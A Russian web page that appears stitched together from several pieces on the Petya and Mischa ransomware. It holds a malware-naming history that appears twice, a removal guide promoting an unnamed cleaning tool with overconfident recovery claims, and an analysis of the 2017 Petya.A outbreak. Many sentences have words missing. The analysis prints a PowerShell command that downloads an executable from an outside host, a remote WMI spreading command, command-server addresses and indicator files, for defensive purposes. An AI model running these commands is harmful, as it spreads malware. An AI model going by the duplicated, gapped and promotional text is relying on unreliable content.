Новый вирус миша. Petya и Misha: кто придумывает названия компьютерных вирусов

Краткий экскурс в историю нейминга вредоносных программ.

В закладки

Логотип вируса Petya.A

27 июня по меньшей мере 80 российских и украинских компаний подверглись атаке вируса Petya.A. Программа заблокировала информацию на компьютерах ведомств и предприятий и также, как и известный вирус-вымогатель , потребовала у пользователей в биткоинах.

Имена вредоносным программам обычно дают сотрудники компаний-разработчиков антивирусов. Исключением становятся те шифровальщики, вымогатели, разрушители и похитители личных данных, которые помимо компьютерных заражений вызывают медийные эпидемии - повышенную шумиху в СМИ и активное обсуждение в cети.

Однако вирус Petya.A - представитель нового поколения. Имя, которым он сам представляется - часть маркетинговой стратегии разработчиков, направленной на повышение его узнаваемости и рост популярности на даркнет-рынке.

Субкультурное явление

В те времена, когда компьютеров было мало и далеко не все они были соединены между собой, самораспространяющиеся программы (ещё не вирусы) уже существовали. Одной из первых таких стал , шутливо приветствовавший пользователя и предлагавший поймать его и удалить. Следующим стал Cookie Monster, требовавший «дать ему печеньку», введя слово «cookie».

Ранние вредоносные программы тоже обладали чувством юмора, хотя оно и не всегда касалось их названий. Так, Ричарда Скрэнта, предназначенный для компьютера Apple-2, раз в 50 загрузок компьютера читал жертве стишок, а имена вирусов, часто скрытые в коде, а не выставленные на показ, отсылали к шуткам и субкультурным словечкам, распространённым в среде гиков того времени. Они могли ассоциироваться с названиями металл-групп, популярной литературой и настольными ролевыми играми.

В конце 20 века создатели вирусов особо не скрывались - более того, часто, когда программа выходила из под контроля, старались принять участие в устранении принесённого ей вреда. Так было с пакистанским и разрушительным , созданным будущим сооснователем бизнес-инкубатора Y-Combinator.

Поэтические способности демонстрировал и один из российских вирусов, упомянутых Евгением Касперским в его книге 1992 года «Компьютерные вирусы в MS-DOS». Программа Condom-1581 время от времени демонстрировала жертве , посвящённое проблемам засорения мирового океана продуктами человеческой жизнедеятельности.

География и календарь

В 1987 году вирус Jerusalem, известный также как Israeli Virus, получил название по месту своего первого обнаружения, а его альтернативное название Black Friday было связано с тем, что он активировался и удалял запускаемые файлы, если 13 число месяца приходилось на пятницу.

По календарному принципу получил название и вирус Michelangelo, вызвавший панику в СМИ весной 1992 года. Тогда Джон Макафи, позже прославившийся созданием одного из самых назойливых антивирусов, во время сиднейской конференции по кибербезопасности, журналистам и публике: «Если вы загрузите инфицированную систему 6 марта, все данные на жёстком диске испортятся». Причём здесь Микеланджело? 6 марта у итальянского художника был день рождения. Впрочем, ужасы, которые предсказывал Макафи, в итоге чрезмерно преувеличенными.

Функциональность

Возможности вируса и его специфика часто служат основой названия. В 1990 году один из первых полиморфных вирусов получил имя Chameleon, а его , обладающий широкими возможностями скрывать своё присутствие (а значит, относящийся к категории стелс-вирусов), был назван Frodo, намекая на героя «Властелина Колец» и скрывающееся от глаз окружающих Кольцо. А, например, вирус OneHalf 1994 года получил своё название из-за того, что проявлял агрессию только заразив половину диска атакуемого устройства.

Служебные названия

Большинство вирусов уже давно получают названия в лабораториях, где их разбирают на части аналитики.

Обычно это скучные порядковые имена и общие «семейные» названия, описывающие категорию вируса, то, какие системы он атакует и что с ними делает (вроде Win32.HLLP.DeTroie). Однако иногда, когда в коде программы удаётся выявить намёки, оставленные разработчиками, вирусы получают немного индивидуальности. Так появились, например, вирусы MyDoom и KooKoo.

Впрочем, это правило работает не всегда - скажем, вирус Stuxnet, остановивший обогащающие уран центрифуги в Иране, не стал называться Myrtus, хотя это слово («мирт»), в коде, и было почти прямым намёком на участие в его разработке израильских спецслужб. В данном случае победило уже ставшее известным широкой публике название, присвоенное вирусу на первых этапах его обнаружения.

Задачи

Часто бывает и так, что вирусы, требующие большого внимания и сил для своего изучения получают у антивирусных компаний красивые названия, которые проще говорить и записывать - так случилось с Red October, дипломатическую переписку и данные, способные повлиять на международные отношения, а также с IceFog, крупномасштабным промышленным шпионажем.

Расширение файлов

Ещё один популярный способ наименования - по расширению, которое вирус присваивает зараженным файлам. Так, один из «военных» вирусов Duqu, был назван так не из-за графа Дуку из «Звёздных войн», а благодаря префиксу ~DQ, который отмечал создаваемые им файлы.

Так же получил своё название нашумевший этой весной вирус WannaCry, маркирующий зашифрованные им данные расширением.wncry.

Более раннее название вируса Wanna Decrypt0r, не прижилось - оно хуже звучало и имело разночтения при написании. Не все удосуживались ставить «0» в качестве «о».

«Вы стали жертвой вируса-вымогателя Petya»

Именно так представляется самая обсуждаемая сегодня вредоносная программа, завершив шифрование файлов на атакованном компьютере. У вируса Petya A. есть не только узнаваемое имя, но и логотип в виде пиратского черепа с костями, и целая маркетингового продвижения. Замеченный вместе со своим братом «Misha» ещё , вирус обратил на себя внимание аналитиков именно этим.

Из субкультурного явления, пройдя через период, когда для такого рода «хакерства» требовались довольно серьёзные технические знания, вирусы превратились в орудие кибер-гоп-стопа. Теперь им приходится играть по рыночным правилам – и кто получает больше внимания, тот и приносит своим разработчикам большие прибыли.

Несколько месяцев назад и мы и другие IT Security специалисты обнаружили новый вредонос – Petya (Win32.Trojan-Ransom.Petya.A) . В классическом понимании он не был шифровальщиком, вирус просто блокировал доступ к определенным типам файлов и требовал выкуп. Вирус модифицировал загрузочную запись на жестком диске, принудительно перезагружал ПК и показывал сообщение о том что “данные зашифрованы – гоните ваши деньги за расшифровку”. В общем стандартная схема вирусов-шифровальщиков за исключением того что файлы фактически НЕ зашифровывались. Большинство популярных антивирусов начали идентифицировать и удалять Win32.Trojan-Ransom.Petya.A через несколько недель после его появления. Кроме того появились инструкции по ручному удалению. Почему мы считаем что Petya не классический шифровальщик? Этот вирус вносит изменения в в Master Boot Record и препятствует загрузке ОС, а также шифрует Master File Table (главную таблицу файлов). Он не шифрует сами файлы.

Однако несколько недель тому назад появился более изощренный вирус Mischa , судя по всему написанный теми же мошенниками. Этот вирус ШИФРУЕТ файлы и требует заплатить за расшифровку 500 – 875$ (в разных версиях 1.5 – 1.8 биткоина). Инструкции по “расшифровке” и оплате за нее хранятся в файлах YOUR_FILES_ARE_ENCRYPTED.HTML и YOUR_FILES_ARE_ENCRYPTED.TXT.

Вирус Mischa – содержимое файла YOUR_FILES_ARE_ENCRYPTED.HTML

Сейчас фактически хакеры заражают компьютеры пользователей двумя вредоносами: Petya и Mischa. Первому нужны права администратора в системе. То есть если пользователь отказывается выдать Petya админские права либо же удалил этот зловред вручную – в дело включается Mischa. Этому вирусу не нужны права администратора, он является классическим шифровальщиком и действительно шифрует файлы по стойкому алгоритму AES и не внося никаких изменений в Master Boot Record и таблицу файлов на винчестере жертвы.

Вредонос Mischa шифрует не только стандартные типы файлов (видео, картинки, презентации, документы), но также файлы.exe. Вирус не затрагивает только директории \Windows, \$Recycle.Bin, \Microsoft, \Mozilla Firefox, \Opera, \Internet Explorer, \Temp, \Local, \LocalLow и \Chrome.

Заражение происходит преимущественно через электронную почту, куда приходит письмо с вложенным файлом – инсталятором вируса. Оно может быть зашифровано под письмо с Налоговой, от Вашего бухгалтера, как вложенные квитанции и чеки о покупках и.т.д. Обращайте внимание на расширения файлов в таких письмах – если это исполнительный файл (.exe), то с большой вероятностью он может быть контейнером с вирусом Petya \ Mischa. И если модификация зловреда свежая – Ваш антивирус может и не отреагировать.

Обновление 30.06.2017: 27 июня модифицированный вариант вируса Petya (Petya.A) массово атаковал пользователей в Украине. Эффект от данной атаки был колоссален и экономический ущерб пока не подсчитан. За один день была парализована работа десятков банков, торговых сетей, государственных учреждений и предприятий разных форм собственности. Вирус распространялся преимущественно через уязвимость в украинской системе подачи бухгалтерской отчетности MeDoc с последним автоматическим обновлением данного ПО. Кроме того вирус затронул и такие страны как Россия, Испания, Великобритания, Франция, Литва.

Удалить вирус Petya и Mischa c помощью автоматического чистильщика

Исключительно эффективный метод работы со зловредным ПО вообще и программами-вымогателями в частности. Использование зарекомендовавшего себя защитного комплекса гарантирует тщательность обнаружения любых вирусных компонентов, их полное удаление одним щелчком мыши. Обратите внимание, речь идет о двух разных процессах: деинсталляции инфекции и восстановления файлов на Вашем ПК. Тем не менее, угроза, безусловно, подлежит удалению, поскольку есть сведения о внедрении прочих компьютерных троянцев с ее помощью.

1. . После запуска программного средства, нажмите кнопку Start Computer Scan (Начать сканирование).
2. Установленное ПО предоставит отчет по обнаруженным в ходе сканирования угрозам. Чтобы удалить все найденные угрозы, выберите опцию Fix Threats (Устранить угрозы). Рассматриваемое зловредное ПО будет полностью удалено.

Восстановить доступ к зашифрованным файлам

Как было отмечено, программа-вымогатель Mischa блокирует файлы с помощью стойкого алгоритма шифрования, так что зашифрованные данные нельзя возобновить взмахом волшебной палочки – если не принимать в расчет оплату неслыханной суммы выкупа (иногда доходит до 1000$). Но некоторые методы действительно могут стать палочкой-выручалочкой, которая поможет восстановить важные данные. Ниже Вы можете с ними ознакомиться.

Программа автоматического восстановления файлов (дешифратор)

Известно весьма неординарное обстоятельство. Данная инфекция стирает исходные файлы в незашифрованном виде. Процесс шифрования с целью вымогательства, таким образом, нацелен на их копии. Это предоставляет возможность таким программным средствам как восстановить стертые объекты, даже если надежность их устранения гарантирована. Настоятельно рекомендуется прибегнуть к процедуре восстановления файлов, ее эффективность не вызывает сомнений.

Теневые копии томов

В основе подхода предусмотренная Windows процедура резервного копирования файлов, которая повторяется в каждой точке восстановления. Важное условие работы данного метода: функция “Восстановление системы” должна быть активирована до момента заражения. При этом любые изменения в файл, внесенные после точки восстановления, в восстановленной версии файла отображаться не будут.

Резервное копирование

Это самый лучший среди всех не связанных с выкупом способов. Если процедура резервного копирования данных на внешний сервер применялась до момента атаки программы-вымогателя на Ваш компьютер, для восстановления зашифрованных файлов понадобиться попросту войти в соответствующий интерфейс, выбрать необходимые файлы и запустить механизм восстановления данных из резерва. Перед выполнением операции необходимо удостовериться, что вымогательское ПО полностью удалено.

Проверить возможное наличие остаточных компонентов вымогателя Petya и Mischa

Очистка в ручном режиме чревата упущением отдельных фрагментов вымогательского ПО, которые могут избежать удаления в виде скрытных объектов операционной системы или элементов реестра. Чтобы исключить риск частичного сохранения отдельных зловредных элементов, выполните сканирование Вашего компьютера с помощью надежного защитного программного комплекса, специализирующегося на зловредном ПО.

Краткий экскурс в историю нейминга вредоносных программ.

В закладки

Логотип вируса Petya.A

27 июня по меньшей мере 80 российских и украинских компаний подверглись атаке вируса Petya.A. Программа заблокировала информацию на компьютерах ведомств и предприятий и также, как и известный вирус-вымогатель , потребовала у пользователей в биткоинах.

Имена вредоносным программам обычно дают сотрудники компаний-разработчиков антивирусов. Исключением становятся те шифровальщики, вымогатели, разрушители и похитители личных данных, которые помимо компьютерных заражений вызывают медийные эпидемии - повышенную шумиху в СМИ и активное обсуждение в cети.

Однако вирус Petya.A - представитель нового поколения. Имя, которым он сам представляется - часть маркетинговой стратегии разработчиков, направленной на повышение его узнаваемости и рост популярности на даркнет-рынке.

Субкультурное явление

В те времена, когда компьютеров было мало и далеко не все они были соединены между собой, самораспространяющиеся программы (ещё не вирусы) уже существовали. Одной из первых таких стал , шутливо приветствовавший пользователя и предлагавший поймать его и удалить. Следующим стал Cookie Monster, требовавший «дать ему печеньку», введя слово «cookie».

Ранние вредоносные программы тоже обладали чувством юмора, хотя оно и не всегда касалось их названий. Так, Ричарда Скрэнта, предназначенный для компьютера Apple-2, раз в 50 загрузок компьютера читал жертве стишок, а имена вирусов, часто скрытые в коде, а не выставленные на показ, отсылали к шуткам и субкультурным словечкам, распространённым в среде гиков того времени. Они могли ассоциироваться с названиями металл-групп, популярной литературой и настольными ролевыми играми.

В конце 20 века создатели вирусов особо не скрывались - более того, часто, когда программа выходила из под контроля, старались принять участие в устранении принесённого ей вреда. Так было с пакистанским и разрушительным , созданным будущим сооснователем бизнес-инкубатора Y-Combinator.

Поэтические способности демонстрировал и один из российских вирусов, упомянутых Евгением Касперским в его книге 1992 года «Компьютерные вирусы в MS-DOS». Программа Condom-1581 время от времени демонстрировала жертве , посвящённое проблемам засорения мирового океана продуктами человеческой жизнедеятельности.

География и календарь

В 1987 году вирус Jerusalem, известный также как Israeli Virus, получил название по месту своего первого обнаружения, а его альтернативное название Black Friday было связано с тем, что он активировался и удалял запускаемые файлы, если 13 число месяца приходилось на пятницу.

По календарному принципу получил название и вирус Michelangelo, вызвавший панику в СМИ весной 1992 года. Тогда Джон Макафи, позже прославившийся созданием одного из самых назойливых антивирусов, во время сиднейской конференции по кибербезопасности, журналистам и публике: «Если вы загрузите инфицированную систему 6 марта, все данные на жёстком диске испортятся». Причём здесь Микеланджело? 6 марта у итальянского художника был день рождения. Впрочем, ужасы, которые предсказывал Макафи, в итоге чрезмерно преувеличенными.

Функциональность

Возможности вируса и его специфика часто служат основой названия. В 1990 году один из первых полиморфных вирусов получил имя Chameleon, а его , обладающий широкими возможностями скрывать своё присутствие (а значит, относящийся к категории стелс-вирусов), был назван Frodo, намекая на героя «Властелина Колец» и скрывающееся от глаз окружающих Кольцо. А, например, вирус OneHalf 1994 года получил своё название из-за того, что проявлял агрессию только заразив половину диска атакуемого устройства.

Служебные названия

Большинство вирусов уже давно получают названия в лабораториях, где их разбирают на части аналитики.

Обычно это скучные порядковые имена и общие «семейные» названия, описывающие категорию вируса, то, какие системы он атакует и что с ними делает (вроде Win32.HLLP.DeTroie). Однако иногда, когда в коде программы удаётся выявить намёки, оставленные разработчиками, вирусы получают немного индивидуальности. Так появились, например, вирусы MyDoom и KooKoo.

Впрочем, это правило работает не всегда - скажем, вирус Stuxnet, остановивший обогащающие уран центрифуги в Иране, не стал называться Myrtus, хотя это слово («мирт»), в коде, и было почти прямым намёком на участие в его разработке израильских спецслужб. В данном случае победило уже ставшее известным широкой публике название, присвоенное вирусу на первых этапах его обнаружения.

Задачи

Часто бывает и так, что вирусы, требующие большого внимания и сил для своего изучения получают у антивирусных компаний красивые названия, которые проще говорить и записывать - так случилось с Red October, дипломатическую переписку и данные, способные повлиять на международные отношения, а также с IceFog, крупномасштабным промышленным шпионажем.

Расширение файлов

Ещё один популярный способ наименования - по расширению, которое вирус присваивает зараженным файлам. Так, один из «военных» вирусов Duqu, был назван так не из-за графа Дуку из «Звёздных войн», а благодаря префиксу ~DQ, который отмечал создаваемые им файлы.

Так же получил своё название нашумевший этой весной вирус WannaCry, маркирующий зашифрованные им данные расширением.wncry.

Более раннее название вируса Wanna Decrypt0r, не прижилось - оно хуже звучало и имело разночтения при написании. Не все удосуживались ставить «0» в качестве «о».

«Вы стали жертвой вируса-вымогателя Petya»

Именно так представляется самая обсуждаемая сегодня вредоносная программа, завершив шифрование файлов на атакованном компьютере. У вируса Petya A. есть не только узнаваемое имя, но и логотип в виде пиратского черепа с костями, и целая маркетингового продвижения. Замеченный вместе со своим братом «Misha» ещё , вирус обратил на себя внимание аналитиков именно этим.

Из субкультурного явления, пройдя через период, когда для такого рода «хакерства» требовались довольно серьёзные технические знания, вирусы превратились в орудие кибер-гоп-стопа. Теперь им приходится играть по рыночным правилам – и кто получает больше внимания, тот и приносит своим разработчикам большие прибыли.

В Интернете новая эпидемия вируса-вымогателя. Вредонос практически блокировал работу десятков крупных компаний, требуя за расшифрование жесткого диска каждой рабочей станции чуть менее $400.

Паника, порожденная новой эпидемией, создала информационный хаос: сначала антивирусные аналитики объявили второе пришествие WannaCry, затем вредонос был определен как комплекс новособранных вирусов-шифровальщиков «Петя» (Petya) и «Миша» (Misha). На данный момент ясно, что если в основе вируса и лежал Petya, то он был сильно модифицирован.

Модель распространения отчасти аналогична WannaCry — используется эксплойт к уязвимости MS17-010, который был усилен социальной инженерией с использованием уязвимости в MS Word. Заражение происходит после открытия пользователем почтового вложения или скачивания файла, которые эксплуатируют уязвимость CVE-2017-0199, опубликованную в апреле 2017 года. А распространение по другим компьютерам в сети уже обеспечивается целым набором техник:

• воруя пароли пользователей или используя активные сессии для доступа к другим узлам сети (используется код утилиты Mimikatz).
• через уязвимость в SMB (CVE-2017-0144, MS17-010) — с использованием того самого знаменитого эксплоита EthernalBlue, который был успешно применен в WannaCry.

Вредонос использует похищенные учетные записи, чтобы скопировать свое тело в шары admin$ и запускает их, используя легальную утилиту PsExec, служащую для удаленного управления компьютером.

Разработчик известной программы Mimikatz, подтвердил , что его видоизмененный код используется для извлечения паролей.

Код использования интерфейса WMI для запуска установки также был опубликован в блоге Microsoft.

Заражение же по вектору SMB идет с использованием уязвимости CVE-2017-0144 аналогично технике, использованной в WannaCry.

А вот модель шифрования существенно изменилась по сравнению с WannaCry. Вирус, проникая на компьютер, заражает MBR (главная загрузочная запись) системы и шифрует несколько первых блоков жесткого диска, включая Master File Table, делая недоступным весь жесткий диск пользователей, а не только отдельные файлы, как это обычно делаю вирусы-вымогатели.

Платить выкуп вымогателям точно не стоит, и не только по этическим соображениям: вирусные аналитики пришли к выводу, что расшифрование файлов после уплаты выкупа в принципе невозможно. Эта функция попросту не заложена во вредонос. По сути, это не эпидемия шифровальшика, а эпидемия вируса-вайпера (wiper-virus), уничтожающего данные.

По сообщениям СМИ в России с наибольшими проблемами столкнулись в корпорации «Роснефть», на продолжительное время были отключены основные сайты корпорации и сайт «Башнефть».

Массовые заражения зафиксированы во Франции, Испании, России, странах СНГ. В Украине от вируса пострадали десятки государственных и коммерческих организаций.

Кому это нужно?

Поскольку механизм восстановления не был заложен в код, возможны три различных варианта мотивации злоумышленников. Либо они хотели замаскировать под массовую эпидемию точечное уничтожение чьих-то конкретных данных, либо хотели заработать, изначально не собираясь ничего восстанавливать. Наименее вероятный вариант — это кибервандализм. Вирус — это серьезный продукт, и силы на его создание было бы разумнее потратить на что-то, приносящее деньги. Вандалы встречались в 1990-е годы, когда было модно ломать системы ради славы, но сейчас они крайне редки.

В итоге главными выгодоприобретателями эпидемий последних 2 месяцев стали, по-видимому, группа The Shadow Brokers, распространившая эксплоит EthernalBlue. Сами вымогатели собрали сравнительно небольшие суммы денег, не несколько порядков меньшие, чем объем ущерба, нанесенного эпидемией. Эпидемии стали отличной рекламой The Shadow Brokers, которые утверждают, что готовы продать информацию об остальных эксплоитах из архива АНБ. Ведь EthernalBlue — всего лишь единственный эксплоит из десятков, украденных у секретной службы в августе 2016 года.

Механизм атаки

Злоумышленник может присылать файлы или ссылки на них (на начальной стадии эпидемии это были файлы Петя.apx, myguy.exe, myguy.xls, Order-[любая дата].doc), через которые происходит заражение рабочей станции под управлением ОС Windows. Например, при открытии файла Order-[любая дата].doc происходит обращение к серверу 84.200.16.242 по порту 80 и загрузка xls:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [идентификатор процесса], Additional Context: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[случайное число].exe") ;)

Затем вредонос пытается подключиться к серверам 111.90.139.247:80 и COFFEINOFFICE.XYZ:80, которые возможно являются серверам управления.

Индикаторами компрометации является наличие файлов:

C:\Windows\perfc.dat
C:\myguy.xls.hta

После закрепления на хосте происходит сканирование других Windows машин в сети и распространение за счет уязвимостей, описанных в MS17-010 (те же, что использовал WannaCry) по портам tcp:135, tcp:139, tcp:445, tcp:1024-1035.

Распространение также можно происходить за счет выполнение команды:

Remote WMI, “process call create "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1”

Схема распространения заражения взята с blog.kryptoslogic.com

Как избежать заражения?

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Петя.apx, myguy.exe, myguy.xls, Order-[любая дата].doc

3. Установить патчи

4. Настроить IPS на блокировку эксплойтов для MS17-010

5. Для защиты еще не зараженных узлов можно создать файл c:\windows\perfc без расширения. Заражение таких узлов не происходит.